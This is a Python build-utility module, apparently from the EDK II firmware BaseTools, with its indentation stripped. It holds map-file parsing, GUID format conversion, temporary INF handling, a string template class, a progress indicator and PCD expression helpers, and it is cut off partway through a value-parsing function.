# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
import sys
import string
import threading
import time
import re
import pickle
import array
import shutil
from random import sample
from struct import pack
import uuid
import subprocess
from collections import OrderedDict
import Common.LongFilePathOs as os
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from Common.DataType import *
from Common.BuildToolError import *
from CommonDataClass.DataClass import *
from Common.Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
from CommonDataClass.Exceptions import BadExpression
from Common.caching import cached_property
## Regular expression used to find out place holders in string template
gPlaceholderPattern = re.compile("\$\{([^$()\s]+)\}", re.MULTILINE | re.UNICODE)
## regular expressions for map file processing
startPatternGeneral = re.compile("^Start[' ']+Length[' ']+Name[' ']+Class")
addressPatternGeneral = re.compile("^Address[' ']+Publics by Value[' ']+Rva\+Base")
valuePatternGcc = re.compile('^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$')
pcdPatternGcc = re.compile('^([\da-fA-Fx]+) +([\da-fA-Fx]+)')
secReGeneral = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
StructPattern = re.compile(r'[_a-zA-Z][0-9A-Za-z_]*$')
## Dictionary used to store dependencies of files
gDependencyDatabase = {} # arch : {file path : [dependent files list]}
#
# If a module is built more than once with different PCDs or library classes
# a temporary INF file with same content is created, the temporary file is removed
# when build exits.
#
_TempInfs = []
def GetVariableOffset(mapfilepath, efifilepath, varnames):
""" Parse map file to get variable offset in current EFI file
@param mapfilepath Map file absolution path
@param efifilepath: EFI binary file full path
@param varnames iteratable container whose elements are variable names to be searched
@return List whos elements are tuple with variable name and raw offset
"""
lines = []
try:
f = open(mapfilepath, 'r')
lines = f.readlines()
f.close()
except:
return None
if len(lines) == 0: return None
firstline = lines[0].strip()
if (firstline.startswith("Archive member included ") and
firstline.endswith(" file (symbol)")):
return _parseForGCC(lines, efifilepath, varnames)
if firstline.startswith("# Path:"):
return _parseForXcode(lines, efifilepath, varnames)
return _parseGeneral(lines, efifilepath, varnames)
def _parseForXcode(lines, efifilepath, varnames):
status = 0
ret = []
for line in lines:
line = line.strip()
if status == 0 and line == "# Symbols:":
status = 1
continue
if status == 1 and len(line) != 0:
for varname in varnames:
if varname in line:
# cannot pregenerate this RegEx since it uses varname from varnames.
m = re.match('^([\da-fA-FxX]+)([\s\S]*)([_]*%s)$' % varname, line)
if m is not None:
ret.append((varname, m.group(1)))
return ret
def _parseForGCC(lines, efifilepath, varnames):
""" Parse map file generated by GCC linker """
status = 0
sections = []
varoffset = []
for index, line in enumerate(lines):
line = line.strip()
# state machine transition
if status == 0 and line == "Memory Configuration":
status = 1
continue
elif status == 1 and line == 'Linker script and memory map':
status = 2
continue
elif status ==2 and line == 'START GROUP':
status = 3
continue
# status handler
if status == 3:
m = valuePatternGcc.match(line)
if m is not None:
sections.append(m.groups(0))
for varname in varnames:
Str = ''
m = re.match("^.data.(%s)" % varname, line)
if m is not None:
m = re.match(".data.(%s)$" % varname, line)
if m is not None:
Str = lines[index + 1]
else:
Str = line[len(".data.%s" % varname):]
if Str:
m = pcdPatternGcc.match(Str.strip())
if m is not None:
varoffset.append((varname, int(m.groups(0)[0], 16), int(sections[-1][1], 16), sections[-1][0]))
if not varoffset:
return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
#redirection
redirection = 0
for efisec in efisecs:
for section in sections:
if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
redirection = int(section[1], 16) - efisec[1]
ret = []
for var in varoffset:
for efisec in efisecs:
if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
return ret
def _parseGeneral(lines, efifilepath, varnames):
status = 0 #0 - beginning of file; 1 - PE section definition; 2 - symbol table
secs = [] # key = section name
varoffset = []
symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$]+) +([\da-fA-F]+)', re.UNICODE)
for line in lines:
line = line.strip()
if startPatternGeneral.match(line):
status = 1
continue
if addressPatternGeneral.match(line):
status = 2
continue
if line.startswith("entry point at"):
status = 3
continue
if status == 1 and len(line) != 0:
m = secReGeneral.match(line)
assert m is not None, "Fail to parse the section in map file , line is %s" % line
sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
if status == 2 and len(line) != 0:
for varname in varnames:
m = symRe.match(line)
assert m is not None, "Fail to parse the symbol in map file, line is %s" % line
sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
sec_no = int(sec_no, 16)
sym_offset = int(sym_offset, 16)
vir_addr = int(vir_addr, 16)
# cannot pregenerate this RegEx since it uses varname from varnames.
m2 = re.match('^[_]*(%s)' % varname, sym_name)
if m2 is not None:
# found a binary PCD entry in map file
for sec in secs:
if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
if not varoffset: return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
ret = []
for var in varoffset:
index = 0
for efisec in efisecs:
index = index + 1
if var[1].strip() == efisec[0].strip():
ret.append((var[0], hex(efisec[2] + var[2])))
elif var[4] == index:
ret.append((var[0], hex(efisec[2] + var[2])))
return ret
## Routine to process duplicated INF
#
# This function is called by following two cases:
# Case 1 in DSC:
# [components.arch]
# Pkg/module/module.inf
# Pkg/module/module.inf {
# <Defines>
# FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
# }
# Case 2 in FDF:
# INF Pkg/module/module.inf
# INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
# This function copies Pkg/module/module.inf to
# Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
# @param Path Original PathClass object
# @param BaseName New file base name
#
# @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
Filename = os.path.split(Path.File)[1]
if '.' in Filename:
Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
else:
Filename = BaseName + Path.BaseName
#
# If -N is specified on command line, cache is disabled
# The directory has to be created
#
DbDir = os.path.split(GlobalData.gDatabasePath)[0]
if not os.path.exists(DbDir):
os.makedirs(DbDir)
#
# A temporary INF is copied to database path which must have write permission
# The temporary will be removed at the end of build
# In case of name conflict, the file name is
# FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
#
TempFullPath = os.path.join(DbDir,
Filename)
RtPath = PathClass(Path.File, Workspace)
#
# Modify the full path to temporary path, keep other unchanged
#
# To build the same module more than once, the module path with FILE_GUID overridden has
# the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
# in DSC which is used as relative path by C files and other files in INF.
# A trick was used: all module paths are PathClass instances, after the initialization
# of PathClass, the PathClass.Path is overridden by the temporary INF path.
#
# The reason for creating a temporary INF is:
# Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
# the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
# A different key for the same module is needed to create different output directory,
# retrieve overridden PCDs, library instances.
#
# The BaseName is the FILE_GUID which is also the output directory name.
#
#
RtPath.Path = TempFullPath
RtPath.BaseName = BaseName
#
# If file exists, compare contents
#
if os.path.exists(TempFullPath):
with open(str(Path), 'rb') as f1, open(TempFullPath, 'rb') as f2:
if f1.read() == f2.read():
return RtPath
_TempInfs.append(TempFullPath)
shutil.copy2(str(Path), TempFullPath)
return RtPath
## Remove temporarily created INFs whose paths were saved in _TempInfs
#
def ClearDuplicatedInf():
while _TempInfs:
File = _TempInfs.pop()
if os.path.exists(File):
os.remove(File)
## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
# @param Guid The GUID string
#
# @retval string The GUID string in C structure style
#
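# Illustrative example (the GUID value is arbitrary, not from the original source):
#
#   GuidStringToGuidStructureString('0D1B936F-68F3-4589-AFCC-FB8B7AEBC836')
#   -> '{0x0D1B936F, 0x68F3, 0x4589, {0xAF, 0xCC, 0xFB, 0x8B, 0x7A, 0xEB, 0xC8, 0x36}}'
#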
def GuidStringToGuidStructureString(Guid):
GuidList = Guid.split('-')
Result = '{'
for Index in range(0, 3, 1):
Result = Result + '0x' + GuidList[Index] + ', '
Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]
for Index in range(0, 12, 2):
Result = Result + ', 0x' + GuidList[4][Index:Index + 2]
Result += '}}'
return Result
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in byte array
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureByteArrayToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 16:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[3], 16),
int(guidValueList[2], 16),
int(guidValueList[1], 16),
int(guidValueList[0], 16),
int(guidValueList[5], 16),
int(guidValueList[4], 16),
int(guidValueList[7], 16),
int(guidValueList[6], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16),
int(guidValueList[11], 16),
int(guidValueList[12], 16),
int(guidValueList[13], 16),
int(guidValueList[14], 16),
int(guidValueList[15], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
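# Illustrative example (value is arbitrary): the inverse of the conversion above;
# for the canonical C-structure form the result is expected to be lower-cased:
#
#   GuidStructureStringToGuidString('{0x0D1B936F, 0x68F3, 0x4589, {0xAF, 0xCC, 0xFB, 0x8B, 0x7A, 0xEB, 0xC8, 0x36}}')
#   -> '0d1b936f-68f3-4589-afcc-fb8b7aebc836'
#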
def GuidStructureStringToGuidString(GuidValue):
if not GlobalData.gGuidCFormatPattern.match(GuidValue):
return ''
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
## Create directories
#
# @param Directory The directory name
#
def CreateDirectory(Directory):
if Directory is None or Directory.strip() == "":
return True
try:
if not os.access(Directory, os.F_OK):
os.makedirs(Directory)
except:
return False
return True
## Remove directories, including files and sub-directories in it
#
# @param Directory The directory name
#
def RemoveDirectory(Directory, Recursively=False):
if Directory is None or Directory.strip() == "" or not os.path.exists(Directory):
return
if Recursively:
CurrentDirectory = os.getcwd()
os.chdir(Directory)
for File in os.listdir("."):
if os.path.isdir(File):
RemoveDirectory(File, Recursively)
else:
os.remove(File)
os.chdir(CurrentDirectory)
os.rmdir(Directory)
## Store content in file
#
# This method is used to save file only when its content is changed. This is
# quite useful for "make" system to decide what will be re-built and what won't.
#
# @param File The path of file
# @param Content The new content of the file
# @param IsBinaryFile The flag indicating if the file is binary file or not
#
# @retval True If the file content is changed and the file is renewed
# @retval False If the file content is the same
#
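# Hedged usage sketch (the path and variable names below are hypothetical):
#
#   Changed = SaveFileOnChange(os.path.join(OutputDir, 'AutoGen.c'), NewCode, IsBinaryFile=False)
#   # Changed is True only when the content differs and the file was rewritten,
#   # so downstream make targets rebuild; otherwise the timestamp is left untouched.
#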
def SaveFileOnChange(File, Content, IsBinaryFile=True):
if os.path.exists(File):
if IsBinaryFile:
try:
with open(File, "rb") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
else:
try:
with open(File, "r") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
DirName = os.path.dirname(File)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
if IsBinaryFile:
try:
with open(File, "wb") as Fd:
Fd.write(Content)
except IOError as X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
else:
try:
with open(File, 'w') as Fd:
Fd.write(Content)
except IOError as X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
return True
## Retrieve and cache the real path name in file system
#
# @param Root The root directory of path relative to
#
# @retval str The path string if the path exists
# @retval None If path doesn't exist
#
class DirCache:
_CACHE_ = set()
_UPPER_CACHE_ = {}
def __init__(self, Root):
self._Root = Root
for F in os.listdir(Root):
self._CACHE_.add(F)
self._UPPER_CACHE_[F.upper()] = F
# =[] operator
def __getitem__(self, Path):
Path = Path[len(os.path.commonprefix([Path, self._Root])):]
if not Path:
return self._Root
if Path and Path[0] == os.path.sep:
Path = Path[1:]
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
UpperPath = Path.upper()
if UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
IndexList = []
LastSepIndex = -1
SepIndex = Path.find(os.path.sep)
while SepIndex > -1:
Parent = UpperPath[:SepIndex]
if Parent not in self._UPPER_CACHE_:
break
LastSepIndex = SepIndex
SepIndex = Path.find(os.path.sep, LastSepIndex + 1)
if LastSepIndex == -1:
return None
Cwd = os.getcwd()
os.chdir(self._Root)
SepIndex = LastSepIndex
while SepIndex > -1:
Parent = Path[:SepIndex]
ParentKey = UpperPath[:SepIndex]
if ParentKey not in self._UPPER_CACHE_:
os.chdir(Cwd)
return None
if Parent in self._CACHE_:
ParentDir = Parent
else:
ParentDir = self._UPPER_CACHE_[ParentKey]
for F in os.listdir(ParentDir):
Dir = os.path.join(ParentDir, F)
self._CACHE_.add(Dir)
self._UPPER_CACHE_[Dir.upper()] = Dir
SepIndex = Path.find(os.path.sep, SepIndex + 1)
os.chdir(Cwd)
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
elif UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
return None
def RealPath(File, Dir='', OverrideDir=''):
NewFile = os.path.normpath(os.path.join(Dir, File))
NewFile = GlobalData.gAllFiles[NewFile]
if not NewFile and OverrideDir:
NewFile = os.path.normpath(os.path.join(OverrideDir, File))
NewFile = GlobalData.gAllFiles[NewFile]
return NewFile
## Get GUID value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def GuidValue(CName, PackageList, Inffile = None):
for P in PackageList:
GuidKeys = list(P.Guids.keys())
if Inffile and P._PrivateGuids:
if not Inffile.startswith(P.MetaFile.Dir):
GuidKeys = [x for x in P.Guids if x not in P._PrivateGuids]
if CName in GuidKeys:
return P.Guids[CName]
return None
return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like following
#
# ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed through a dict. The
# "placeholder_name" is the key name of the dict. The ${BEGIN} and ${END} can
# be not used and, in this case, the "placeholder_name" must not a list and it
# will just be replaced once.
#
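# Hedged usage sketch (template text and values are made up):
#
#   Tmpl = TemplateString("Files:\n${BEGIN}  ${name}\n${END}")
#   Tmpl.Replace({'name': ['a.c', 'b.c']})
#   -> "Files:\n  a.c\n  b.c\n"
#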
class TemplateString(object):
_REPEAT_START_FLAG = "BEGIN"
_REPEAT_END_FLAG = "END"
class Section(object):
_LIST_TYPES = [type([]), type(set()), type((0,))]
def __init__(self, TemplateSection, PlaceHolderList):
self._Template = TemplateSection
self._PlaceHolderList = []
# Split the section into sub-sections according to the position of placeholders
if PlaceHolderList:
self._SubSectionList = []
SubSectionStart = 0
#
# The placeholders passed in must be in the format of
#
# PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
#
for PlaceHolder, Start, End in PlaceHolderList:
self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
self._SubSectionList.append(TemplateSection[Start:End])
self._PlaceHolderList.append(PlaceHolder)
SubSectionStart = End
if SubSectionStart < len(TemplateSection):
self._SubSectionList.append(TemplateSection[SubSectionStart:])
else:
self._SubSectionList = [TemplateSection]
def __str__(self):
return self._Template + " : " + str(self._PlaceHolderList)
def Instantiate(self, PlaceHolderValues):
RepeatTime = -1
RepeatPlaceHolders = {}
NonRepeatPlaceHolders = {}
for PlaceHolder in self._PlaceHolderList:
if PlaceHolder not in PlaceHolderValues:
continue
Value = PlaceHolderValues[PlaceHolder]
if type(Value) in self._LIST_TYPES:
if RepeatTime < 0:
RepeatTime = len(Value)
elif RepeatTime != len(Value):
EdkLogger.error(
"TemplateString",
PARAMETER_INVALID,
"${%s} has different repeat time from others!" % PlaceHolder,
ExtraData=str(self._Template)
)
RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
else:
NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
if NonRepeatPlaceHolders:
StringList = []
for S in self._SubSectionList:
if S not in NonRepeatPlaceHolders:
StringList.append(S)
else:
StringList.append(str(NonRepeatPlaceHolders[S]))
else:
StringList = self._SubSectionList
if RepeatPlaceHolders:
TempStringList = []
for Index in range(RepeatTime):
for S in StringList:
if S not in RepeatPlaceHolders:
TempStringList.append(S)
else:
TempStringList.append(str(RepeatPlaceHolders[S][Index]))
StringList = TempStringList
return "".join(StringList)
## Constructor
def __init__(self, Template=None):
self.String = []
self.IsBinary = False
self._Template = Template
self._TemplateSectionList = self._Parse(Template)
## str() operator
#
# @retval string The string replaced
#
def __str__(self):
return "".join(self.String)
## Split the template string into fragments per the ${BEGIN} and ${END} flags
#
# @retval list A list of TemplateString.Section objects
#
def _Parse(self, Template):
SectionStart = 0
SearchFrom = 0
MatchEnd = 0
PlaceHolderList = []
TemplateSectionList = []
while Template:
MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
if not MatchObj:
if MatchEnd <= len(Template):
TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
break
MatchString = MatchObj.group(1)
MatchStart = MatchObj.start()
MatchEnd = MatchObj.end()
if MatchString == self._REPEAT_START_FLAG:
if MatchStart > SectionStart:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
elif MatchString == self._REPEAT_END_FLAG:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
else:
PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
SearchFrom = MatchEnd
return TemplateSectionList
## Replace the string template with dictionary of placeholders and append it to previous one
#
# @param AppendString The string template to append
# @param Dictionary The placeholder dictionaries
#
def Append(self, AppendString, Dictionary=None):
if Dictionary:
SectionList = self._Parse(AppendString)
self.String.append( "".join(S.Instantiate(Dictionary) for S in SectionList))
else:
if isinstance(AppendString,list):
self.String.extend(AppendString)
else:
self.String.append(AppendString)
## Replace the string template with dictionary of placeholders
#
# @param Dictionary The placeholder dictionaries
#
# @retval str The string replaced with placeholder values
#
def Replace(self, Dictionary=None):
return "".join(S.Instantiate(Dictionary) for S in self._TemplateSectionList)
## Progress indicator class
#
# This class makes use of thread to print progress on console.
#
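# Hedged usage sketch (messages are made up):
#
#   P = Progressor("Processing meta-data", "done!")
#   P.Start()   # prints "Processing meta-data " followed by one '.' per Interval
#   ...         # long-running work
#   P.Stop()    # stops the progress thread and prints " done!"
#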
class Progressor:
# for avoiding an infinite loop
_StopFlag = None
_ProgressThread = None
_CheckInterval = 0.25
## Constructor
#
# @param OpenMessage The string printed before progress characters
# @param CloseMessage The string printed after progress characters
# @param ProgressChar The character used to indicate the progress
# @param Interval The interval in seconds between two progress characters
#
def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
self.PromptMessage = OpenMessage
self.CodaMessage = CloseMessage
self.ProgressChar = ProgressChar
self.Interval = Interval
if Progressor._StopFlag is None:
Progressor._StopFlag = threading.Event()
## Start to print progress character
#
# @param OpenMessage The string printed before progress characters
#
def Start(self, OpenMessage=None):
if OpenMessage is not None:
self.PromptMessage = OpenMessage
Progressor._StopFlag.clear()
if Progressor._ProgressThread is None:
Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
Progressor._ProgressThread.setDaemon(False)
Progressor._ProgressThread.start()
## Stop printing progress character
#
# @param CloseMessage The string printed after progress characters
#
def Stop(self, CloseMessage=None):
OriginalCodaMessage = self.CodaMessage
if CloseMessage is not None:
self.CodaMessage = CloseMessage
self.Abort()
self.CodaMessage = OriginalCodaMessage
## Thread entry method
def _ProgressThreadEntry(self):
sys.stdout.write(self.PromptMessage + " ")
sys.stdout.flush()
TimeUp = 0.0
while not Progressor._StopFlag.isSet():
if TimeUp <= 0.0:
sys.stdout.write(self.ProgressChar)
sys.stdout.flush()
TimeUp = self.Interval
time.sleep(self._CheckInterval)
TimeUp -= self._CheckInterval
sys.stdout.write(" " + self.CodaMessage + "\n")
sys.stdout.flush()
## Abort the progress display
@staticmethod
def Abort():
if Progressor._StopFlag is not None:
Progressor._StopFlag.set()
if Progressor._ProgressThread is not None:
Progressor._ProgressThread.join()
Progressor._ProgressThread = None
## Dictionary using prioritized list as key
#
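# Hedged usage sketch (keys and values are made up). In single-value mode a lookup
# that misses a concrete key falls back to the COMMON wildcard entry:
#
#   D = tdict(True, 2)                 # single-value mode, two key levels
#   D['COMMON', 'DEBUG'] = '-O0'
#   D['IA32', 'DEBUG'] = '-O2'
#   D['IA32', 'DEBUG']                 # -> '-O2'
#   D['X64', 'DEBUG']                  # -> '-O0' (wildcard fallback)
#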
class tdict:
_ListType = type([])
_TupleType = type(())
_Wildcard = 'COMMON'
_ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', TAB_STAR, 'PLATFORM']
def __init__(self, _Single_=False, _Level_=2):
self._Level_ = _Level_
self.data = {}
self._Single_ = _Single_
# =[] operator
def __getitem__(self, key):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
elif self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey is None or str(FirstKey).upper() in self._ValidWildcardList:
FirstKey = self._Wildcard
if self._Single_:
return self._GetSingleValue(FirstKey, RestKeys)
else:
return self._GetAllValues(FirstKey, RestKeys)
def _GetSingleValue(self, FirstKey, RestKeys):
Value = None
#print "%s-%s" % (FirstKey, self._Level_) ,
if self._Level_ > 1:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None:
for Key in self.data:
Value = self.data[Key][RestKeys]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None and self._Wildcard in self.data:
#print "Value=None"
Value = self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey]
if Value is None:
for Key in self.data:
Value = self.data[Key]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey]
elif self._Wildcard in self.data:
Value = self.data[self._Wildcard]
return Value
def _GetAllValues(self, FirstKey, RestKeys):
Value = []
if self._Level_ > 1:
if FirstKey == self._Wildcard:
for Key in self.data:
Value += self.data[Key][RestKeys]
else:
if FirstKey in self.data:
Value += self.data[FirstKey][RestKeys]
if self._Wildcard in self.data:
Value += self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
for Key in self.data:
Value.append(self.data[Key])
else:
if FirstKey in self.data:
Value.append(self.data[FirstKey])
if self._Wildcard in self.data:
Value.append(self.data[self._Wildcard])
return Value
## []= operator
def __setitem__(self, key, value):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
else:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey in self._ValidWildcardList:
FirstKey = self._Wildcard
if FirstKey not in self.data and self._Level_ > 0:
self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
if self._Level_ > 1:
self.data[FirstKey][RestKeys] = value
else:
self.data[FirstKey] = value
def SetGreedyMode(self):
self._Single_ = False
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetGreedyMode()
def SetSingleMode(self):
self._Single_ = True
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetSingleMode()
def GetKeys(self, KeyIndex=0):
assert KeyIndex >= 0
if KeyIndex == 0:
return set(self.data.keys())
else:
keys = set()
for Key in self.data:
keys |= self.data[Key].GetKeys(KeyIndex - 1)
return keys
def AnalyzePcdExpression(Setting):
RanStr = ''.join(sample(string.ascii_letters + string.digits, 8))
Setting = Setting.replace('\\\\', RanStr).strip()
# There might be escaped quote in a string: \", \\\" , \', \\\'
Data = Setting
# There might be '|' inside a string or inside ( ... | ... ); replace it with '-'
NewStr = ''
InSingleQuoteStr = False
InDoubleQuoteStr = False
Pair = 0
for Index, ch in enumerate(Data):
if ch == '"' and not InSingleQuoteStr:
if Data[Index - 1] != '\\':
InDoubleQuoteStr = not InDoubleQuoteStr
elif ch == "'" and not InDoubleQuoteStr:
if Data[Index - 1] != '\\':
InSingleQuoteStr = not InSingleQuoteStr
elif ch == '(' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair += 1
elif ch == ')' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair -= 1
if (Pair > 0 or InSingleQuoteStr or InDoubleQuoteStr) and ch == TAB_VALUE_SPLIT:
NewStr += '-'
else:
NewStr += ch
FieldList = []
StartPos = 0
while True:
Pos = NewStr.find(TAB_VALUE_SPLIT, StartPos)
if Pos < 0:
FieldList.append(Setting[StartPos:].strip())
break
FieldList.append(Setting[StartPos:Pos].strip())
StartPos = Pos + 1
for i, ch in enumerate(FieldList):
if RanStr in ch:
FieldList[i] = ch.replace(RanStr,'\\\\')
return FieldList
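# Illustrative example (the setting string is made up): a '|' inside a quoted
# string is preserved while the unquoted separators still split the fields:
#
#   AnalyzePcdExpression('L"A|B"|VOID*|10')
#   -> ['L"A|B"', 'VOID*', '10']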
def ParseFieldValue (Value):
def ParseDevPathValue (Value):
if '\\' in Value:
Value = Value.replace('\\', '/').replace(' ', '')
Cmd = 'DevicePath ' + '"' + Value + '"'
try:
p = subprocess.Popen(Cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = p.communicate()
except Exception as X:
raise BadExpression("DevicePath: %s" % (str(X)) )
finally:
subprocess._cleanup()
p.stdout.close()
p.stderr.close()
if err:
raise BadExpression("DevicePath: %s" % str(err))
out = out.decode(encoding='utf-8', errors='ignore')
Size = len(out.split())
out = ','.join(out.split())
return '{' + out + '}', Size
if "{CODE(" in Value:
return Value, len(Value.split(","))
if isinstance(Value, type(0)):
return Value, (Value.bit_length() + 7) // 8
if not isinstance(Value, type('')):
raise BadExpression('Type %s is %s' %(Value, type(Value)))
Value = Value.strip()
if Value.startswith(TAB_UINT8) and Value.endswith(')'):
